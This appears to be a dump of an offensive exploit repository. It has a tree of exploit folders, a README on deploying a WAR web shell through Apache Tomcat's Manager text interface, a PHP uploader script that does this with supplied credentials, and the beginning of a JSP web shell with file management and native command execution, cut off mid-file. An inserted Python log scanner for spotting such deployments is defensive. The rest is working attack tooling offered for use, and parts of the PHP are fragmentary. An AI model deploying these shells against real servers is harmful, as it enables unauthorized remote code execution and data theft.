```text
.
├── Apache-Tomcat-Text_interface-shell-upload
│   ├── README.md
│   ├── b0x.php
│   ├── b0x.war
│   ├── r.jsp
│   ├── s.jsp
│   ├── screenshot.png
│   └── sh3lls.war
├── DALIM-Software-web-applications_server
│   ├── README.md
│   ├── dal_exploit.png
│   └── id_rsa
├── Joomla-SQL-Injection-3.7
│   ├── 3xpl0173r.php
│   ├── README.md
│   └── SQL Injection joomla.png
├── MSSQL Error-Based SQL Injection Order by clause
│   ├── Error based SQL Injection in “Order By” clause (MSSQL).pdf
│   └── README.md
├── POSNIC
│   ├── SQL-Injection.php
│   ├── posnic.png
│   ├── posnic_exploit_code.php
│   └── readme.md
├── README.md
├── RFI-PHP-SMB_server
│   └── README.md
├── TestLink (version <= 1.9.19) Server Side Request Forgery
│   ├── POCs
│   │   ├── 1 (Request to local machine open port).png
│   │   ├── 2 (Request to local machine closed port).png
│   │   ├── 3 (Internal IP server and request to open port).png
│   │   ├── 4 (Internal IP with open port).png
│   │   ├── 5 (Internal IP with closed Port).png
│   │   ├── 6 (Non-existing Internal IP).png
│   │   ├── README.md
│   │   ├── script1.png
│   │   └── script2.png
│   ├── README.md
│   └── testlink_ssrf.php
├── TestLink -below 1.9.17- Remote Code Execution
│   ├── README.md
│   └── testlink POC.png
├── WordPress Polls plugin-1.2.4- SQL Injection vulnerability
│   ├── README.md
│   └── injected.png
└── vBulletin-forum-runner-SQL-Injection
    └── README.md
```

--------------------------------------------------------------------------------
/Apache-Tomcat-Text_interface-shell-upload/README.md:
--------------------------------------------------------------------------------
This PHP script can deploy a WAR file on a target server through the Apache Tomcat text interface when the Manager GUI is not enabled.

![POC](https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/master/Apache-Tomcat-Text_interface-shell-upload/screenshot.png)

In the common scenario, an attacker achieves remote code execution on a server running Apache Tomcat by getting into the Apache Tomcat Manager GUI panel: the panel credentials are brute-forced or guessed, or default user accounts are tried. Once the attacker has access to the Manager GUI panel, deploying a WAR file containing a JSP web shell gives remote code execution on the server.

Apache Tomcat has built-in functionality to deploy WAR files (archives containing Java code), and the Manager GUI panel (accessible to authenticated users only) is the usual way to do it.

This is not always the case, though: the Tomcat admin user may not have the rights to access the Manager GUI panel, which limits the possibility of remote code execution, since the attacker needs access to the GUI panel to deploy a WAR file.

After exploring the Apache Tomcat documentation, it came to my knowledge that Apache Tomcat after version 7 also has a "Text interface" which allows deployment of WAR files on the server. The text interface is purely command based and has no GUI.

When I was searching around for remote WAR file deployment using the "Text Interface", I found a link to a gist on github.com in which a developer mentioned a curl command to upload a WAR file to the server using the "Text Interface". The "Text Interface" supports remote WAR file uploading through a PUT request (authenticated users only), so if an attacker has access to the "Text Interface", a crafted curl PUT request deploys the WAR file on the Tomcat server.

I exploited the server in 2 ways:

1) By using a manual curl command on a Linux system.

2) By developing a PHP script which makes the same curl request and needs only the Apache Tomcat installation URL, the username and password of the Tomcat panel, the WAR file to upload to the target server, and the deployment name under which the WAR file will be deployed on the server.
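The deployment path described above leaves a clear trace in Tomcat's access log. The following is an added example for defenders, not part of this repository: it flags requests to the Manager deploy endpoints in access log lines and the first requests into the newly created context. The log lines are constructed samples, and the field layout assumes Tomcat's default AccessLogValve `common` pattern.

```python
"""Flag WAR deployments through the Tomcat Manager interfaces in access logs.

Added example for defenders; not part of this repository. The log lines below
are constructed samples in Tomcat's default AccessLogValve "common" pattern.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# AccessLogValve pattern "common":  %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager endpoints that accept a WAR and create a new context:
# /manager/text/deploy is the text interface (PUT, role manager-script),
# /manager/html/upload is the GUI form (POST, role manager-gui).
DEPLOY_ENDPOINTS = ("/manager/text/deploy", "/manager/html/upload")

# Constructed sample log: a GUI attempt that is refused, a text-interface
# deploy that succeeds, the deployed JSP being used, and unrelated traffic.
SAMPLE_LOG = """\
10.0.0.5 - tomcat [03/Mar/2024:10:15:01 +0000] "GET /manager/html HTTP/1.1" 403 1123
10.0.0.5 - tomcat [03/Mar/2024:10:15:09 +0000] "PUT /manager/text/deploy?path=/b0x HTTP/1.1" 200 53
10.0.0.5 - - [03/Mar/2024:10:15:20 +0000] "GET /b0x/r.jsp?dir=/etc HTTP/1.1" 200 4812
192.168.1.20 - - [03/Mar/2024:10:16:00 +0000] "GET /index.html HTTP/1.1" 200 11156
192.168.1.20 - - [03/Mar/2024:10:16:03 +0000] "GET /b0xes/static.css HTTP/1.1" 404 -
"""


@dataclass
class DeployEvent:
    source: str      # %h: client address
    user: str        # %u: authenticated Manager user ("-" if none)
    method: str
    endpoint: str
    context: str     # path= value: where the new web application is served
    status: int

    @property
    def succeeded(self) -> bool:
        return self.status == 200 and self.context != ""


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def deploy_events(lines: Iterable[str]) -> List[DeployEvent]:
    """Every request to a Manager deploy endpoint, whatever its outcome."""
    events = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.startswith(DEPLOY_ENDPOINTS):
            continue
        # The text interface passes the context in the query string; the GUI
        # upload derives it from the WAR file name, so context may be empty.
        context = parse_qs(parts.query).get("path", [""])[0]
        events.append(DeployEvent(rec["host"], rec["user"], rec["method"],
                                  parts.path, context, int(rec["status"])))
    return events


def follow_on_requests(lines: Iterable[str],
                       events: List[DeployEvent]) -> List[Tuple[str, str, str]]:
    """Requests served from a context created by a successful deploy, i.e. the
    uploaded application being used. Returns (context, path, client) triples."""
    contexts = [ev.context for ev in events if ev.succeeded]
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        for ctx in contexts:
            # Require the "/" separator so /b0xes does not match context /b0x.
            if path == ctx or path.startswith(ctx + "/"):
                hits.append((ctx, path, rec["host"]))
    return hits


if __name__ == "__main__":
    log = SAMPLE_LOG.splitlines()
    events = deploy_events(log)
    for ev in events:
        print(f"deploy via {ev.endpoint} from {ev.source} as {ev.user}: "
              f"{ev.method} context={ev.context or '?'} status={ev.status}")
    for ctx, path, src in follow_on_requests(log, events):
        print(f"request into new context {ctx}: {path} from {src}")
```

A successful `PUT` to `/manager/text/deploy` from an address that is not a known deployment host, followed within seconds by requests into the new context, is the sequence this script is built to surface.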
--------------------------------------------------------------------------------
/Apache-Tomcat-Text_interface-shell-upload/b0x.php:
--------------------------------------------------------------------------------
```php
<?php
// Page title: --==[[Mannu Sh3LL]]==--
// The HTML markup, stylesheet and the $head string (lines 1-204 of the file)
// were lost with their tags in this copy; only the visible text survives.

echo $head;

echo '
--==[[ Apache Tomcat shell uploader]]==--
--==[[ With Love From IndiShell Crew]]==--

####################################################################################################################################

--==[[Greetz to]]==--
zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba, Silent poison India, Magnum sniper, ethicalnoob Indishell, cyber warrior, Hacker Fantastic and rest of TEAM INDISHELL

--==[[Love to]]==--
My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Jagriti, Hardeep Singh, Ashu bhai ji, Rafay Baloch, Soldier Of God, Shafoon, Rehan Manzoor, almas malik, Bhuppi, Mohit, Ffe ^_^, Govind Singh, Shardhanand, Budhaoo, Don(Deepika kaushik) and D3

####################################################################################################################################
';
?>

<!-- Upload form (markup lost in this copy). Its fields, in order:
     Apache Tomcat Target URL
     Tomcat interface Username
     Tomcat interface Password
     WAR file having JSP shell in it
     WAR file deploy name -->

<?php
// Lines 278-301, which opened the block closed by the two stray braces below
// and read the form fields into $username and $password, were also lost.
';

}

// Text-interface deploy URL: the WAR is PUT as the request body and Tomcat
// deploys it under the context path given in the path= parameter.
$url = trim($_POST['url']).'/manager/text/deploy?path=/'.trim($_POST['deploy']);

$localFile = $_FILES['file']['tmp_name'];
$fdata = fopen($localFile, 'r');

$curl = curl_init();

// Built but never used: the body is streamed from $fdata via CURLOPT_INFILE.
$cfile = new CURLFILE($_FILES['file']['tmp_name'], $_FILES['file']['type'], $_FILES['file']['name']);
curl_setopt_array($curl,
    array(
        CURLOPT_PUT => 1,
        CURLOPT_UPLOAD => 1,
        CURLOPT_INFILE => $fdata,
        CURLOPT_USERPWD => $username.':'.$password,
        CURLOPT_HTTPAUTH => CURLAUTH_BASIC,     // Manager credentials go in the Authorization header
        CURLOPT_NOPROGRESS => false,
        CURLOPT_BUFFERSIZE => 128,
        CURLOPT_INFILESIZE => filesize($localFile),
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_ENCODING => "",
        CURLOPT_MAXREDIRS => 10,
        CURLOPT_TIMEOUT => 30,
        CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
        CURLOPT_HTTPHEADER => array("content-type: multipart/form-data"),
    )
);
$response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
    echo "Error #:" . $err;
}
else {
    // Tomcat answers "OK - Deployed application at context path [/name]" on success.
    echo $response;
    echo 'Enjoy your shell at '.trim($_POST['url']).'/'.trim($_POST['deploy']).'/r.jsp';
}

}

echo "Developed By 1046 at IndiShell Lab";

?>
```

--------------------------------------------------------------------------------
/Apache-Tomcat-Text_interface-shell-upload/b0x.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/incredibleindishell/exploit-code-by-me/224126ea6f407a8456f1f93393135345273cb413/Apache-Tomcat-Text_interface-shell-upload/b0x.war

--------------------------------------------------------------------------------
/Apache-Tomcat-Text_interface-shell-upload/r.jsp:
--------------------------------------------------------------------------------
1 | <%@page import="java.util.*, 2 | java.net.*, 3 | java.text.*, 4 | java.util.zip.*, 5 | java.io.*" 6 | %> 7 | 8 | 9 |
10 | 11 | --==[[ Moded By 1046]]==--
12 | 13 | 14 |
19 | 20 | 21 | 22 | ####################################################################################################################################
23 | 24 | 25 |
26 | 27 |
28 |
29 | <%! 30 | private static final boolean NATIVE_COMMANDS = true; 31 | private static final boolean RESTRICT_BROWSING = false; 32 | private static final boolean RESTRICT_WHITELIST = false; 33 | private static final String RESTRICT_PATH = "/etc;/var"; 34 | private static final int UPLOAD_MONITOR_REFRESH = 2; private static final int EDITFIELD_COLS = 85; private static final int EDITFIELD_ROWS = 30; private static final boolean USE_POPUP = true; 35 | private static final boolean USE_DIR_PREVIEW = true; 36 | private static final int DIR_PREVIEW_NUMBER = 10; 37 | private static final String CSS_NAME = "Browser.css"; 38 | private static final int COMPRESSION_LEVEL = 1; 39 | private static final String[] FORBIDDEN_DRIVES = {"a:\\"}; 40 | private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows 41 | private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds 42 | private static final String SAVE_AS_ZIP = "Download selected files as zip"; 43 | private static final String RENAME_FILE = "Rename File"; 44 | private static final String DELETE_FILES = "Delete selected files"; 45 | private static final String CREATE_DIR = "Create Dir"; 46 | private static final String CREATE_FILE = "Create File"; 47 | private static final String MOVE_FILES = "Move Files"; 48 | private static final String COPY_FILES = "Copy Files"; 49 | private static String tempdir = "."; 50 | private static String VERSION_NR = "1.1a"; 51 | private static DateFormat dateFormat = DateFormat.getDateTimeInstance(); 52 | 53 | public class UplInfo { 54 | 55 | public long totalSize; 56 | public long currSize; 57 | public long starttime; 58 | public boolean aborted; 59 | 60 | public UplInfo() { 61 | totalSize = 0l; 62 | currSize = 0l; 63 | starttime = System.currentTimeMillis(); 64 | aborted = false; 65 | } 66 | 67 | public UplInfo(int size) { 68 | totalSize = size; 69 | currSize = 0; 70 | starttime = System.currentTimeMillis(); 71 | aborted = false; 72 | } 73 | 74 | public 
String getUprate() { 75 | long time = System.currentTimeMillis() - starttime; 76 | if (time != 0) { 77 | long uprate = currSize * 1000 / time; 78 | return convertFileSize(uprate) + "/s"; 79 | } 80 | else return "n/a"; 81 | } 82 | 83 | public int getPercent() { 84 | if (totalSize == 0) return 0; 85 | else return (int) (currSize * 100 / totalSize); 86 | } 87 | 88 | public String getTimeElapsed() { 89 | long time = (System.currentTimeMillis() - starttime) / 1000l; 90 | if (time - 60l >= 0){ 91 | if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; 92 | else return time / 60 + ":0" + (time % 60) + "m"; 93 | } 94 | else return time<10 ? "0" + time + "s": time + "s"; 95 | } 96 | 97 | public String getTimeEstimated() { 98 | if (currSize == 0) return "n/a"; 99 | long time = System.currentTimeMillis() - starttime; 100 | time = totalSize * time / currSize; 101 | time /= 1000l; 102 | if (time - 60l >= 0){ 103 | if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m"; 104 | else return time / 60 + ":0" + (time % 60) + "m"; 105 | } 106 | else return time<10 ? 
"0" + time + "s": time + "s"; 107 | } 108 | 109 | } 110 | 111 | public class FileInfo { 112 | 113 | public String name = null, clientFileName = null, fileContentType = null; 114 | private byte[] fileContents = null; 115 | public File file = null; 116 | public StringBuffer sb = new StringBuffer(100); 117 | 118 | public void setFileContents(byte[] aByteArray) { 119 | fileContents = new byte[aByteArray.length]; 120 | System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length); 121 | } 122 | } 123 | 124 | public static class UploadMonitor { 125 | 126 | static Hashtable uploadTable = new Hashtable(); 127 | 128 | static void set(String fName, UplInfo info) { 129 | uploadTable.put(fName, info); 130 | } 131 | 132 | static void remove(String fName) { 133 | uploadTable.remove(fName); 134 | } 135 | 136 | static UplInfo getInfo(String fName) { 137 | UplInfo info = (UplInfo) uploadTable.get(fName); 138 | return info; 139 | } 140 | } 141 | 142 | // A Class with methods used to process a ServletInputStream 143 | public class HttpMultiPartParser { 144 | 145 | private final String lineSeparator = System.getProperty("line.separator", "\n"); 146 | private final int ONE_MB = 1024 * 1; 147 | 148 | public Hashtable processData(ServletInputStream is, String boundary, String saveInDir, 149 | int clength) throws IllegalArgumentException, IOException { 150 | if (is == null) throw new IllegalArgumentException("InputStream"); 151 | if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException( 152 | "\"" + boundary + "\" is an illegal boundary indicator"); 153 | boundary = "--" + boundary; 154 | StringTokenizer stLine = null, stFields = null; 155 | FileInfo fileInfo = null; 156 | Hashtable dataTable = new Hashtable(5); 157 | String line = null, field = null, paramName = null; 158 | boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0); 159 | boolean isFile = false; 160 | if (saveFiles) { // Create the required directory (including parent 
dirs) 161 | File f = new File(saveInDir); 162 | f.mkdirs(); 163 | } 164 | line = getLine(is); 165 | if (line == null || !line.startsWith(boundary)) throw new IOException( 166 | "Boundary not found; boundary = " + boundary + ", line = " + line); 167 | while (line != null) { 168 | if (line == null || !line.startsWith(boundary)) return dataTable; 169 | line = getLine(is); 170 | if (line == null) return dataTable; 171 | stLine = new StringTokenizer(line, ";\r\n"); 172 | if (stLine.countTokens() < 2) throw new IllegalArgumentException( 173 | "Bad data in second line"); 174 | line = stLine.nextToken().toLowerCase(); 175 | if (line.indexOf("form-data") < 0) throw new IllegalArgumentException( 176 | "Bad data in second line"); 177 | stFields = new StringTokenizer(stLine.nextToken(), "=\""); 178 | if (stFields.countTokens() < 2) throw new IllegalArgumentException( 179 | "Bad data in second line"); 180 | fileInfo = new FileInfo(); 181 | stFields.nextToken(); 182 | paramName = stFields.nextToken(); 183 | isFile = false; 184 | if (stLine.hasMoreTokens()) { 185 | field = stLine.nextToken(); 186 | stFields = new StringTokenizer(field, "=\""); 187 | if (stFields.countTokens() > 1) { 188 | if (stFields.nextToken().trim().equalsIgnoreCase("filename")) { 189 | fileInfo.name = paramName; 190 | String value = stFields.nextToken(); 191 | if (value != null && value.trim().length() > 0) { 192 | fileInfo.clientFileName = value; 193 | isFile = true; 194 | } 195 | else { 196 | line = getLine(is); // Skip "Content-Type:" line 197 | line = getLine(is); // Skip blank line 198 | line = getLine(is); // Skip blank line 199 | line = getLine(is); // Position to boundary line 200 | continue; 201 | } 202 | } 203 | } 204 | else if (field.toLowerCase().indexOf("filename") >= 0) { 205 | line = getLine(is); // Skip "Content-Type:" line 206 | line = getLine(is); // Skip blank line 207 | line = getLine(is); // Skip blank line 208 | line = getLine(is); // Position to boundary line 209 | continue; 210 | } 
211 | } 212 | boolean skipBlankLine = true; 213 | if (isFile) { 214 | line = getLine(is); 215 | if (line == null) return dataTable; 216 | if (line.trim().length() < 1) skipBlankLine = false; 217 | else { 218 | stLine = new StringTokenizer(line, ": "); 219 | if (stLine.countTokens() < 2) throw new IllegalArgumentException( 220 | "Bad data in third line"); 221 | stLine.nextToken(); // Content-Type 222 | fileInfo.fileContentType = stLine.nextToken(); 223 | } 224 | } 225 | if (skipBlankLine) { 226 | line = getLine(is); 227 | if (line == null) return dataTable; 228 | } 229 | if (!isFile) { 230 | line = getLine(is); 231 | if (line == null) return dataTable; 232 | dataTable.put(paramName, line); 233 | // If parameter is dir, change saveInDir to dir 234 | if (paramName.equals("dir")) saveInDir = line; 235 | line = getLine(is); 236 | continue; 237 | } 238 | try { 239 | UplInfo uplInfo = new UplInfo(clength); 240 | UploadMonitor.set(fileInfo.clientFileName, uplInfo); 241 | OutputStream os = null; 242 | String path = null; 243 | if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir, 244 | fileInfo.clientFileName)); 245 | else os = new ByteArrayOutputStream(ONE_MB); 246 | boolean readingContent = true; 247 | byte previousLine[] = new byte[2 * ONE_MB]; 248 | byte temp[] = null; 249 | byte currentLine[] = new byte[2 * ONE_MB]; 250 | int read, read3; 251 | if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { 252 | line = null; 253 | break; 254 | } 255 | while (readingContent) { 256 | if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { 257 | line = null; 258 | uplInfo.aborted = true; 259 | break; 260 | } 261 | if (compareBoundary(boundary, currentLine)) { 262 | os.write(previousLine, 0, read - 2); 263 | line = new String(currentLine, 0, read3); 264 | break; 265 | } 266 | else { 267 | os.write(previousLine, 0, read); 268 | uplInfo.currSize += read; 269 | temp = currentLine; 270 | currentLine = previousLine; 271 | previousLine = 
temp; 272 | read = read3; 273 | }//end else 274 | }//end while 275 | os.flush(); 276 | os.close(); 277 | if (!saveFiles) { 278 | ByteArrayOutputStream baos = (ByteArrayOutputStream) os; 279 | fileInfo.setFileContents(baos.toByteArray()); 280 | } 281 | else fileInfo.file = new File(path); 282 | dataTable.put(paramName, fileInfo); 283 | uplInfo.currSize = uplInfo.totalSize; 284 | }//end try 285 | catch (IOException e) { 286 | throw e; 287 | } 288 | } 289 | return dataTable; 290 | } 291 | private boolean compareBoundary(String boundary, byte ba[]) { 292 | byte b; 293 | if (boundary == null || ba == null) return false; 294 | for (int i = 0; i < boundary.length(); i++) 295 | if ((byte) boundary.charAt(i) != ba[i]) return false; 296 | return true; 297 | } 298 | private synchronized String getLine(ServletInputStream sis) throws IOException { 299 | byte b[] = new byte[1024]; 300 | int read = sis.readLine(b, 0, b.length), index; 301 | String line = null; 302 | if (read != -1) { 303 | line = new String(b, 0, read); 304 | if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1); 305 | } 306 | return line; 307 | } 308 | 309 | public String getFileName(String dir, String fileName) throws IllegalArgumentException { 310 | String path = null; 311 | if (dir == null || fileName == null) throw new IllegalArgumentException( 312 | "dir or fileName is null"); 313 | int index = fileName.lastIndexOf('/'); 314 | String name = null; 315 | if (index >= 0) name = fileName.substring(index + 1); 316 | else name = fileName; 317 | index = name.lastIndexOf('\\'); 318 | if (index >= 0) fileName = name.substring(index + 1); 319 | path = dir + File.separator + fileName; 320 | if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); 321 | else return path.replace('/', File.separatorChar); 322 | } 323 | } //End of class HttpMultiPartParser 324 | class FileComp implements Comparator { 325 | 326 | int mode; 327 | int sign; 328 | 329 | FileComp() { 330 | this.mode = 
1; 331 | this.sign = 1; 332 | } 333 | 334 | /** 335 | * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type 336 | * The default sorting method is by Name 337 | * Negative mode means descending sort 338 | */ 339 | FileComp(int mode) { 340 | if (mode < 0) { 341 | this.mode = -mode; 342 | sign = -1; 343 | } 344 | else { 345 | this.mode = mode; 346 | this.sign = 1; 347 | } 348 | } 349 | 350 | public int compare(Object o1, Object o2) { 351 | File f1 = (File) o1; 352 | File f2 = (File) o2; 353 | if (f1.isDirectory()) { 354 | if (f2.isDirectory()) { 355 | switch (mode) { 356 | //Filename or Type 357 | case 1: 358 | case 4: 359 | return sign 360 | * f1.getAbsolutePath().toUpperCase().compareTo( 361 | f2.getAbsolutePath().toUpperCase()); 362 | //Filesize 363 | case 2: 364 | return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); 365 | //Date 366 | case 3: 367 | return sign 368 | * (new Long(f1.lastModified()) 369 | .compareTo(new Long(f2.lastModified()))); 370 | default: 371 | return 1; 372 | } 373 | } 374 | else return -1; 375 | } 376 | else if (f2.isDirectory()) return 1; 377 | else { 378 | switch (mode) { 379 | case 1: 380 | return sign 381 | * f1.getAbsolutePath().toUpperCase().compareTo( 382 | f2.getAbsolutePath().toUpperCase()); 383 | case 2: 384 | return sign * (new Long(f1.length()).compareTo(new Long(f2.length()))); 385 | case 3: 386 | return sign 387 | * (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified()))); 388 | case 4: { // Sort by extension 389 | int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.'); 390 | int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.'); 391 | if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension 392 | return sign 393 | * f1.getAbsolutePath().toUpperCase().compareTo( 394 | f2.getAbsolutePath().toUpperCase()); 395 | } 396 | // f1 has no extension 397 | else if (tempIndexf1 == -1) return -sign; 398 | // f2 has no extension 399 | else if (tempIndexf2 == -1) return sign; 400 | // 
Both have an extension 401 | else { 402 | String tempEndf1 = f1.getAbsolutePath().toUpperCase() 403 | .substring(tempIndexf1); 404 | String tempEndf2 = f2.getAbsolutePath().toUpperCase() 405 | .substring(tempIndexf2); 406 | return sign * tempEndf1.compareTo(tempEndf2); 407 | } 408 | } 409 | default: 410 | return 1; 411 | } 412 | } 413 | } 414 | } 415 | class Writer2Stream extends OutputStream { 416 | 417 | Writer out; 418 | 419 | Writer2Stream(Writer w) { 420 | super(); 421 | out = w; 422 | } 423 | 424 | public void write(int i) throws IOException { 425 | out.write(i); 426 | } 427 | 428 | public void write(byte[] b) throws IOException { 429 | for (int i = 0; i < b.length; i++) { 430 | int n = b[i]; 431 | //Convert byte to ubyte 432 | n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); 433 | out.write(n); 434 | } 435 | } 436 | 437 | public void write(byte[] b, int off, int len) throws IOException { 438 | for (int i = off; i < off + len; i++) { 439 | int n = b[i]; 440 | n = ((n >>> 4) & 0xF) * 16 + (n & 0xF); 441 | out.write(n); 442 | } 443 | } 444 | } //End of class Writer2Stream 445 | 446 | static Vector expandFileList(String[] files, boolean inclDirs) { 447 | Vector v = new Vector(); 448 | if (files == null) return v; 449 | for (int i = 0; i < files.length; i++) 450 | v.add(new File(URLDecoder.decode(files[i]))); 451 | for (int i = 0; i < v.size(); i++) { 452 | File f = (File) v.get(i); 453 | if (f.isDirectory()) { 454 | File[] fs = f.listFiles(); 455 | for (int n = 0; n < fs.length; n++) 456 | v.add(fs[n]); 457 | if (!inclDirs) { 458 | v.remove(i); 459 | i--; 460 | } 461 | } 462 | } 463 | return v; 464 | } 465 | 466 | /** 467 | * Method to build an absolute path 468 | * @param dir the root dir 469 | * @param name the name of the new directory 470 | * @return if name is an absolute directory, returns name, else returns dir+name 471 | */ 472 | static String getDir(String dir, String name) { 473 | if (!dir.endsWith(File.separator)) dir = dir + File.separator; 474 | File mv = 
new File(name); 475 | String new_dir = null; 476 | if (!mv.isAbsolute()) { 477 | new_dir = dir + name; 478 | } 479 | else new_dir = name; 480 | return new_dir; 481 | } 482 | 483 | /** 484 | * This Method converts a byte size in a kbytes or Mbytes size, depending on the size 485 | * @param size The size in bytes 486 | * @return String with size and unit 487 | */ 488 | static String convertFileSize(long size) { 489 | int divisor = 1; 490 | String unit = "bytes"; 491 | if (size >= 1024 * 1024) { 492 | divisor = 1024 * 1024; 493 | unit = "MB"; 494 | } 495 | else if (size >= 1024) { 496 | divisor = 1024; 497 | unit = "KB"; 498 | } 499 | if (divisor == 1) return size / divisor + " " + unit; 500 | String aftercomma = "" + 100 * (size % divisor) / divisor; 501 | if (aftercomma.length() == 1) aftercomma = "0" + aftercomma; 502 | return size / divisor + "." + aftercomma + " " + unit; 503 | } 504 | 505 | /** 506 | * Copies all data from in to out 507 | * @param in the input stream 508 | * @param out the output stream 509 | * @param buffer copy buffer 510 | */ 511 | static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException { 512 | copyStreamsWithoutClose(in, out, buffer); 513 | in.close(); 514 | out.close(); 515 | } 516 | 517 | /** 518 | * Copies all data from in to out 519 | * @param in the input stream 520 | * @param out the output stream 521 | * @param buffer copy buffer 522 | */ 523 | static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer) 524 | throws IOException { 525 | int b; 526 | while ((b = in.read(buffer)) != -1) 527 | out.write(buffer, 0, b); 528 | } 529 | static String getMimeType(String fName) { 530 | fName = fName.toLowerCase(); 531 | if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg"; 532 | else if (fName.endsWith(".gif")) return "image/gif"; 533 | else if (fName.endsWith(".pdf")) return "application/pdf"; 534 | else if (fName.endsWith(".htm") || 
fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html"; 535 | else if (fName.endsWith(".avi")) return "video/x-msvideo"; 536 | else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime"; 537 | else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg"; 538 | else if (fName.endsWith(".zip")) return "application/zip"; 539 | else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff"; 540 | else if (fName.endsWith(".rtf")) return "application/rtf"; 541 | else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi"; 542 | else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv") 543 | || fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt") 544 | || fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel"; 545 | else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword"; 546 | else if (fName.endsWith(".png")) return "image/png"; 547 | else if (fName.endsWith(".xml")) return "text/xml"; 548 | else if (fName.endsWith(".svg")) return "image/svg+xml"; 549 | else if (fName.endsWith(".mp3")) return "audio/mp3"; 550 | else if (fName.endsWith(".ogg")) return "audio/ogg"; 551 | else return "text/plain"; 552 | } 553 | 554 | /** 555 | * Converts some important chars (int) to the corresponding html string 556 | */ 557 | static String conv2Html(int i) { 558 | if (i == '&') return "&"; 559 | else if (i == '<') return "<"; 560 | else if (i == '>') return ">"; 561 | else if (i == '"') return """; 562 | else return "" + (char) i; 563 | } 564 | 565 | /** 566 | * Converts a normal string to a html conform string 567 | */ 568 | static String conv2Html(String st) { 569 | StringBuffer buf = new StringBuffer(); 570 | for (int i = 0; i < st.length(); i++) { 571 | buf.append(conv2Html(st.charAt(i))); 572 | } 573 | return buf.toString(); 574 | } 575 | 576 | /** 577 | * Starts 
a native process on the server 578 | * @param command the command to start the process 579 | * @param dir the dir in which the process starts 580 | */ 581 | static String startProcess(String command, String dir) throws IOException { 582 | StringBuffer ret = new StringBuffer(); 583 | String[] comm = new String[3]; 584 | comm[0] = COMMAND_INTERPRETER[0]; 585 | comm[1] = COMMAND_INTERPRETER[1]; 586 | comm[2] = command; 587 | long start = System.currentTimeMillis(); 588 | try { 589 | //Start process 590 | Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir)); 591 | //Get input and error streams 592 | BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream()); 593 | BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream()); 594 | boolean end = false; 595 | while (!end) { 596 | int c = 0; 597 | while ((ls_err.available() > 0) && (++c <= 1000)) { 598 | ret.append(conv2Html(ls_err.read())); 599 | } 600 | c = 0; 601 | while ((ls_in.available() > 0) && (++c <= 1000)) { 602 | ret.append(conv2Html(ls_in.read())); 603 | } 604 | try { 605 | ls_proc.exitValue(); 606 | //if the process has not finished, an exception is thrown 607 | //else 608 | while (ls_err.available() > 0) 609 | ret.append(conv2Html(ls_err.read())); 610 | while (ls_in.available() > 0) 611 | ret.append(conv2Html(ls_in.read())); 612 | end = true; 613 | } 614 | catch (IllegalThreadStateException ex) { 615 | //Process is running 616 | } 617 | //The process is not allowed to run longer than given time. 618 | if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) { 619 | ls_proc.destroy(); 620 | end = true; 621 | ret.append("!!!! 
